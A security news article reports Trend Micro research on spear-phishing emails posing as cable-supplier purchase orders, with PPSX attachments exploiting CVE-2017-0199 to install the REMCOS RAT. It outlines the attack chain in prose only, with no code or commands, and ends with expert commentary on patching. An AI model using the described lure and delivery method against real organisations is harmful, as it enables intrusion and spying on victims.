Malicious PowerPoint slide show files deliver REMCOS RAT

News by Bradley Barth

Malware distributors are now maliciously crafting PowerPoint Open XML Slide Show (PPSX) files to take advantage of a Microsoft Office vulnerability.

Also in:

In what researchers are calling a first, malware distributors are now maliciously crafting PowerPoint Open XML Slide Show (PPSX) files to take advantage of a Microsoft Office vulnerability that is more typically exploited with Rich Text File documents.

The bug in this case is CVE-2017-0199, a vulnerability in Microsoft Office's Windows Object linking and Embedding interface, according to Trend Micro, whose researchers uncovered the scheme. Microsoft patched this bug in April 2017.

So far the attacks have largely focused on companies in the electronics manufacturing industry, with the intent of infecting them with a trojanised version of the REMCOS remote access tool (RAT). The REMCOS tool comes with myriad features for attackers, including the ability to download and execute commands, a keylogger, a screen logger, and webcam and microphone recorders.

In a 14 August  blog post, Trend Micro threat analysts Ronnie Giagone and Rubio Wu said that the adversaries likely swapped RTF files with PPSX files to change things up and "evade antivirus detection."

The threat first arrives in the form of a spear-phishing email that appears to be sent from a cable manufacturing provider looking to place a large order. The email specifically asks if the recipient can supply a list of items, requesting a price quote and estimated delivery date.

However, upon opening up the attached file, all the recipient actually sees is a PPSX document that displays the vulnerability identifier "CVE-2017-8570." Strangely, this is not the vulnerability actually being exploited (as referenced before, the vulnerability being abused is CVE-2017-0199) –  a quirk that Trend Micro chalks up to an error on the part of the toolkit developer.

The malicious PPSX file leverages the exploit to download another file, which Trend Micro detects as JS_DLOADER.AUSYVT, from an abused VPN or hosting service. This XML file, written in JavaScript, is essentially a malicious downloader program that runs a PowerShell command in order to retrieve the main REMCOS payload, which is camouflaged using various obfuscations and protections.

"Cases like this highlight the need for users to be cautious when opening files or clicking links in their emails –  even if they come from seemingly legitimate sources," the blog post advises. "Spear phishing attempts can be rather sophisticated, and as seen with this example, can trick most users into downloading malicious files."

Earlier this month, Trend Micro reported on a different spear phishing campaign, targeting Russian-speaking businesses, that infects victims with a backdoor program using malformed RTF files that also exploit CVE-2017-0199.

Tod Beardsley, research director at Rapid7, said in emailed comments that while the attackers' use of Power Point Slide Show may be of interest to security researchers, the more significant takeaway is that these campaigns continue to work because many users fail to patch vulnerabilities and open suspicious attachments.

“Security researchers continue to be fascinated with novel attack vectors, exotic cryptography attacks, and zero-day vulnerabilities, but out in the real world, people are dealing with 120+ day vulnerabilities that depend on users failing to install patches and running malicious code emailed to them by strangers," said Beardsley. Spearphishing with malicious attachments continues to be a devastatingly effective technique for online criminals, and we in security need to be doing a better job when it comes to partnering with our friends in IT operations and software development to make this attack more expensive and less effective."

"The fact is, the headlines around CVE-2017-0199 could have been written any time in the last 15 years," Beardsley continued. "This alone tells me that we're clearly not making enough headway against phishing campaigns.”

Find this article useful?

Get more great articles like this in your inbox every lunchtime

Upcoming Events